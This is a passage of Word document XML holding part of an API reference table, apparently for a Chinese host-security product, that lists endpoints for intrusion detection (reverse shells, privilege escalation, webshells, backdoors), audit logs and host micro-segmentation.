            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/detect/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bounceshell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="65499FB3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="653B46ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">入侵检测 - </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>本地/</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>容器</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>内提权</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E1CEA82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>本地提权数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="265D5319" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/detect/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>localrights</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6F1831B3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54808A04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>入侵检测 - 可疑操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="623B9C2F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>可疑操作数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23E3A406" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/detect/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>shelllog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3C5D9AC8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E3790B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>入侵检测 - 网络蜜罐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04B7C3E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>网络蜜罐规则设置及数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18E24AD5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/detect/honeypot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0DC8940A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E07B67B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>入侵检测 - Web后门</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38F085FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>web后门扫描及数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E513E1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>websecurity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>webshell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="57420F84" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62E3EB6B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>入侵检测 - Linux后门检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CCB5304" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Linux后门检测扫描及数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F3CB6E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/detect/backdoor/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C57B6B3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C5A12FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>入侵检测 - Windows后门检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46978486" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Windows后门检测扫描及数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DC3D1E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/detect/backdoor/win</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="58CC10A5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C08C492" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统审计日志查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="276A032F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统审计日志数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2908FC84" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/system/audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="59EB1BE3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27A768BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>快速任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C6978CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务的建立、扫描及数据查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="554BD9B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>/external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>fastjob</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0880A9BE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B99C356" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>微隔离 - 主机一键隔离</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44E774FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>查询一键隔离列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E7FD0F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>GET /external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ms-srv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/segmentation/list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="399FAE9A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AFC8403" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>微隔离 - 主机一键隔离</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54614473" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>查询隔离详情</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="328BD60E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>GET /external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ms-srv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/segmentation/detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A8906BF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DFA29C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>微隔离 - 主机一键隔离</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41219D58" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>创建隔离接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="419E21F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>POST /external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ms-srv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/segmentation/create</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2AE62DD2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25D4B251" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>微隔离 - 主机一键隔离</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BC99A99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修改隔离接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="303CE33B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>POST /external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ms-srv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/segmentation/edit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="66AD9B26" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B788D88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>微隔离 - 主机一键隔离</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3ADA75BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>解除隔离接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69E3E3F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>DELETE /external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ms-srv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/segmentation/del</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1FF5957D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D25FCE3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>微隔离 - 主机一键隔离</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25636283" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>删除隔离接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70C71174" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>DELETE /external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ms-srv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/segmentation/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realDel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7E4C0A00" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B74AA1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>微隔离 - 主机一键隔离</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35AEDBE0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>重试隔离接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1035E2D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>POST /external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ms-srv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/segmentation/retry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3D1BDD01" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46288F2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>微隔离 - 主机管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D09577D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>查询主机列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A6E1B59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>GET /external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ms-srv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/hosts/list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="14DD953B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FA47A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>微隔离 - 主机管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C9AC447" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修改主机开关</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6868BB12" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>POST /external/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ms-srv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/hosts/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-enable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="692C4E31" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13B2BD4C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>微隔离 - 拦截黑名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B14BD50" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>查询黑名单策略列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75AF8272" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>GET /external/</w:t>
            </w:r>
